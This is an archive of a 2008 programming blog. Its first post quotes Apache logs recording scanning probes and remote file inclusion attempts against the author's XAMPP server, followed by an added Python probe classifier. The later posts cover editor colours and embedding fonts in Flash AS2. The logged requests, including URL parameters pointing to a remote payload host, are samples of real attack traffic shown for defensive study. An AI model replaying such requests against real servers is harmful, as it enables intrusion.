Saturday 29 November 2008

File System Security - Part I

Hello,

Today I am going to talk about file system security on a web server, because I got a few attempts to hack my local XAMPP server.

I went to the Apache logs and I saw something quite interesting:
Access.log:
200.69.177.20 - - [27/Nov/2008:16:19:53 +0000] "GET //user/templates/footer.tpl HTTP/1.1" 404 1122
222.208.183.218 - - [28/Nov/2008:09:51:56 +0000] "GET http://www.nassc.com/pr.php HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /errors.php?error=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /admin/business_inc/saveserver.php?thisdir=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:20:14 +0000] "GET /upload.php HTTP/1.1" 404 1122
216.55.83.12 - - [29/Nov/2008:08:15:55 +0000] "GET /phpmyadmin/main.php HTTP/1.0" 200 3071
222.208.183.218 - - [29/Nov/2008:11:16:36 +0000] "GET http://www.wantsfly.com/prx1.php?hash=047CB197FF160516516CE156005088B4C955CE39C55F HTTP/1.0" 404 1125
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /sqlitemanager/main.php HTTP/1.1" 404 1122
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /SQLiteManager/main.php HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:31 +0000] "GET //README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde2//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde3//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde-3.0.5//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.6//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.7//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.8//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.9//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /mail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /email//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /webmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /newmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mails//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mailz//README HTTP/1.1" 404 1122
81.180.165.131 - - [05/Dec/2008:08:37:43 +0000] "GET /twiki/ HTTP/1.0" 404 1122
81.180.165.131 - - [05/Dec/2008:09:17:52 +0000] "GET /wiki/ HTTP/1.0" 404 1122
218.58.226.13 - - [07/Dec/2008:07:21:54 +0000] "GET /manager/html HTTP/1.1" 404 1122


And error.log:
[Thu Nov 27 16:19:53 2008] [error] [client 200.69.177.20] File does not exist: F:/xampp/htdocs/user
[Fri Nov 28 09:51:57 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/pr.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/errors.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/admin
[Fri Nov 28 18:20:14 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/upload.php' not found or unable to stat
[Sat Nov 29 11:16:36 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/prx1.php' not found or unable to stat
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/sqlitemanager
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/SQLiteManager
[Wed Dec 03 18:44:21 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/PMA
[Wed Dec 03 18:44:25 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/db
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/dbadmin
[Wed Dec 03 18:44:29 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/web
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpmyadmin2
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysqladmin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql-admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] script 'F:/xampp/htdocs/main.php' not found or unable to stat
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.6
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.4
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.1
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.3
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.6
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/myadmin
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-rc1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.2-rc1
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantisbt
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/tracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtrack
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/support
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bug
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugs
[Thu Dec 04 11:25:04 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantis


So I came to the conclusion not to use those files or folders.
Luckily, it is a server for uploading our own tests and nothing could happen anyway. :)

Whenever I find more security tips I will post them on the blog. I hope it helps to stop hackers.
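
As an added example (not code from the original post), the following Python code sorts the requests in the access.log excerpt above into the kinds of probes it shows: URLs passed as parameter values, absolute-URI proxy tests, bursts of 404s from one client, and an admin path that answered 200. The label names, the `ADMIN_PREFIXES` list and the `scan_threshold` of 3 are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache common log format: host ident user [time] "METHOD target PROTO" status bytes
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')
SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Assumption: admin tools worth alerting on when a probe gets a 200 (names taken from the log above).
ADMIN_PREFIXES = ("/phpmyadmin", "/sqlitemanager", "/manager/html")

# Sample input: lines copied from the access.log excerpt in this post.
SAMPLE = '''\
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /errors.php?error=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
222.208.183.218 - - [28/Nov/2008:09:51:56 +0000] "GET http://www.nassc.com/pr.php HTTP/1.1" 404 1122
216.55.83.12 - - [29/Nov/2008:08:15:55 +0000] "GET /phpmyadmin/main.php HTTP/1.0" 200 3071
196.41.26.67 - - [04/Dec/2008:12:28:31 +0000] "GET //README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde2//README HTTP/1.1" 404 1122
81.180.165.131 - - [05/Dec/2008:08:37:43 +0000] "GET /twiki/ HTTP/1.0" 404 1122
'''.splitlines()

def classify(target, status):
    """Return the set of probe labels for one request target and its status."""
    tags = set()
    if SCHEME_RE.match(target):
        tags.add("proxy-probe")             # absolute URI: client is testing for an open proxy
        return tags
    path, _, query = target.partition("?")
    if any(SCHEME_RE.match(v) for _, v in parse_qsl(query, keep_blank_values=True)):
        tags.add("remote-include-attempt")  # a URL passed as a parameter value
    if status == 200 and path.lower().startswith(ADMIN_PREFIXES):
        tags.add("admin-tool-reachable")    # the probe found something that exists
    return tags

def analyse(lines, scan_threshold=3):
    """Map each client IP to its labels; many distinct 404 paths marks a path scan."""
    labels, misses = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                        # skip lines that are not common log format
        host, target, status = m.group(1), m.group(2), int(m.group(3))
        labels[host] |= classify(target, status)
        if status == 404:
            misses[host].add(target.partition("?")[0])
    for host, paths in misses.items():
        if len(paths) >= scan_threshold:
            labels[host].add("path-scan")
    return {host: sorted(tags) for host, tags in labels.items()}
```

Running `analyse()` over the full access.log rather than the sample gives one list of labels per client; the `admin-tool-reachable` label is the one to act on first, since it marks a probe that was answered.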

Wednesday 15 October 2008

Nice environments for programming

I have been working with horrendous IDEs for a long time. My eyes hurt sometimes last year and I had to put artificial tears in my eyes for about 8 months, because I worked too hard for a period of two months, working about 12 hours a day every day using 2 monitors (17" + 22")...
How did I solve my problem? I worked less, and my eyes started to recover.

Sometimes we have tight deadlines or we are enjoying creating something nice, so we don't want to stop even when we feel our eyes are suffering... Yesterday I thought that was enough! So I started researching good environments for programming... not GUIs, just the environment (colour and font).

Then I remembered a friend had told me about the font "Consolas", so I decided to give it a try. But hey, I need Windows Vista for that; they don't let you download it for free anywhere. So I researched... I found that if you install MS PowerPoint Viewer 2007 it will install the fonts for free! Yay!

After installing it I had the fonts on Windows XP, cool... first step done.

Now I have to activate the annoying ClearType... I come from the MSX times; I like pixelated fonts:

But I thought maybe now is the time to move to the smooth-font generation! So I enabled ClearType... I didn't like it at the beginning, but then I got used to it and it is fine.

Then I went to my Flash GUI and changed all the colours. I did it quite randomly, but with a bit of common sense I came up with a nice colour scheme. Mixed with Consolas and ClearType I got a VERY nice environment that is a pleasure to work with...


So if we compare it to the Windows XP Flash IDE default:

I hope you think twice about using that white background of yours and give this a try...

The settings I'm using are:

Colors:

Foreground: #FFFFFF
Keywords: #996600
Identifiers: #00CCFF
Background: #333333
Comments: #666666
Strings: #009900

Font:

Font: Consolas
Font size: 11

You can use any colours of course, but remember not to make them too strong...

I hope you can tell me better combinations if you find them :)

Wednesday 9 April 2008

Embedding dynamic fonts on Flash AS2

EDIT: READ THIS ONE INSTEAD, IT IS BETTER WRITTEN AND HAS BETTER INSTRUCTIONS.

IF YOU WANT TO GET LOST AND SEE WRONG EXAMPLES, GO AHEAD AND READ THIS ONE....



Today, after a couple of years on and off (more off than on) researching how to embed fonts in Flash, I found a real solution. The solution was explained in a comment on another blog as if it were nothing important, but I can tell you it "made me a son", as we say in Spain when somebody (or sometimes something) does something for you that you really needed.

Then I carried on researching shared libraries... Hmm, you can't change the library dynamically. But you can load Flash files that have static libraries... It got me thinking... I started realizing what it was...

I came up with a solution. It is probably what Matt said in that forum, but at that moment I had no idea how to use libraries...

Anyway, this is how it works:
Step 1: The preloader loads font1.swf, which has font1Embed.swf as its library. That means it has the font embedded and it can be used now.

Step 2: All the library components can be used in preloader.swf.

Step 3: We load main.swf (we have everything we need loaded) and main.swf can use the library of "preloader.swf".

It is easy once you understand it... The great thing is you can load any library dynamically.

I will explain how to get dynamic fonts right now, step by step:

Ingredients:

  • a SWF file for the preloader,
  • 2 SWFs per font
  • any SWF that uses the font.

Cooking Time:
  • 10 to 15 minutes.
  • and then 3 minutes per font.

Preparation:

Character sauce:
Create an empty Flash file in AS2.0.
Create a text box with the Flash GUI.
Select any font and embed the characters you want.
Convert that text box into a movieclip, or better said: put the text inside a movieclip.

Normally when I cook texts I assign names to the instances on the stage, such as "label_txt" for the text and "text_mc" for the movieclip. You can tell what kind of object everything is just by checking for "_mc" or "_txt".

When you have the convert to movieclip box on screen, click on Export for runtime sharing.
Assign a nice Identifier to it, something that will be used as a generic name for all the fonts you want to embed, something like: "dynamicFont".
Click on the URL box and write the name that this SWF file will have when exported.

I suggest something that will let you identify your files easily: "embedFont1.swf"

Leave it published on a folder for several minutes.


Font container:

Create another empty flash file on AS2.0.

In the library, click on New Symbol and then click on "Import for runtime sharing"; it will ask you for a URL and an identifier. Enter the same name as the SWF file you just exported in Step 1, and use the same Identifier too. The new object can have any name; just make sure it is a movieClip.

Export the Flash file to the same folder as before. Use a name that will help you match this file with the other exported file. It gets especially confusing when there are lots of other files in the same folder. So we will use a name like: "font1.swf"

We should now have two files in the folder: "font1.swf" and "embedFont1.swf".


Preloader:

We need to load all of these fonts before the real flash movie begins. So we are going to create a preloader, load the fonts first and load the main movie afterwards.

I generated a FLA with some code for it. It is a simple loader. I am placing the code here and, as I have told you, I will explain everything!

on Frame 1:
this.createEmptyMovieClip ("loaderA_mc", 0);
this.createEmptyMovieClip ("loaderB_mc", 1);
loaderA_mc._visible = loaderB_mc._visible = false;

_global._font = "nameOfYourFont";
_global._fontID = "1";

// We load the font container movieClip.
this.loaderA_mc.loadMovie ("font1.swf");

// To make it more dynamic I have added a variable called "_global._fontID", which is the number of your font (1 in the example):
//this.loaderA_mc.loadMovie ("font" + _global._fontID + ".swf");

this.onEnterFrame = this.preloader;

function preloader () {
    if (this.loaderA_mc.getBytesLoaded () > 0) {
        if (loaderA_mc.getBytesLoaded () == loaderA_mc.getBytesTotal ()) {
            // When the font SWF file is loaded, it will load the main movie, but you don't really need to do it.
            this.loaderA_mc.loadMovie ("mainMovie.swf");
            // We destroy this onEnterFrame and create new functionality for another onEnterFrame if you want another preloader for the main movie.
            //this.onEnterFrame = this.preloaderB;

            // If you just want to show the real file just write this:
            //_level0.loadMovie ("mainMovie.swf");
            delete this.onEnterFrame;
        }
    }
}


Then on the main flash file you need to create all of this code in order to test it:

var my_fmt:TextFormat = new TextFormat();

my_fmt.font = _global._font ;
my_fmt.size = 40;

this.createTextField("my_txt", this.getNextHighestDepth(), 40, 40, 260, 160);
my_txt.wordWrap = true;
my_txt.embedFonts = true;
my_txt.text = "Hello Mundo";
my_txt.setTextFormat(my_fmt);
my_txt._rotation = 15;


Now you have to publish this test file as "mainMovie.swf" and the preloader under any name... "preloader.swf"? All files need to be in the same folder.

Now if you publish all files with the correct names and in the correct folder, whenever you start the preloader it should work.


Add glass sugar and a smile, and there you have what you have been looking for for ages!


Original idea in: Odd hammer
Preloader and more information: Quasimondo.com

Thanks to you both.


Saturday 26 January 2008

Hello World

Hello, let me introduce myself: I'm Jaime, an ActionScript programmer. I will start posting my bits and pieces shortly, since a lot of things are happening in my digital surroundings. Writing is not my strong point, but I will do what I can :)